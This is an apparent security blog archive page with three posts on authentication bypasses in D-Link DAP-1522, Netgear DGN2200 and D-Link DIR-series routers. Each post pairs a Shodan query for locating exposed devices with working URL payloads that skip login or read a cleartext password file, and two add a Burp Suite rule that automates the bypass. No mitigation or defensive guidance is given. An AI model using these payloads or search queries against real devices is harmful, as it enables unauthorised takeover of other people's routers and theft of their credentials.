Posts

Showing posts from July, 2021

CVE-2020-15896 Authentication Bypass D-Link DAP-1522 Wireless N Dualband Access Point

Image
Introduction CVE-2020-15896 is an authentication bypass vulnerability in D-Link DAP-1522 Wireless N Dualband Access Point with fimware version 1.4x. Device Identification Identify vulnerable devices using following Shodan query: DAP-1522 Ver 1.4? Authentication Bypass View the web pages of the router by appending  ?NO_NEED_AUTH=1&AUTH_GROUP=0 to every URL as given below: http://deviceIP/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://deviceIP/adv_acl.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://deviceIP/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0 Automation Using Burp Suite Proxy Match and Replace In Burp Suite, Proxy > Options tab, add a Match and Replace rule to replace " HTTP/1.1 " with " ?NO_NEED_AUTH=1&AUTH_GROUP=0 HTTP1.1 " From now on, every request in browser will be automatically appended with ?NO_NEED_AUTH=1&AUTH_GROUP=0 . Video
Post a Comment
Read more

Authentication Bypass - Netgear DGN2200 N300 Wireless ADSL2+ Modem Router

Image
Introduction Authentication bypass vulnerability exist in Netgear DGN2200 N300 Wireless ADSL2+ Modem Router version v1. Device Identification Identify vulnerable devices from the results of following Shodan search query: netgear dgn2200 Authentication Bypass View the web pages of the router with out any credentials by appending ?test.gif to every URL as given below. http://deviceIP:port/RST_status.htm?test.gif http://deviceIP:port/BAS_pppoa.htm?test.gif http://deviceIP:port/WAN_wan.htm?test.gif Automation Using Burp Suite Proxy Match and Replace In Burp Suite Proxy > Options tab, add a Match and Replace rule to replace " HTTP/1.1 " with " ?test.gif HTTP1.1 " From now on, every request in browser will be automatically appended with ?test.gif . Video
Post a Comment
Read more

CVE-2017-12943 D-Link DIR Series Authentication Bypass

Image
 Introduction Login to vulnerable DIR series routers (eg. DIR-600) by viewing cleartext credentials. Device Identification Identify vulnerable devices from the result of following Shodan query. http.favicon.hash:1037387972 Mathopd/1.5p6 View Credentials View the content of /var/etc/httpasswd file by appending following to router web login page URL. /model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd Login to the router using the credentials displayed on the left side of page. Video
Post a Comment
Read more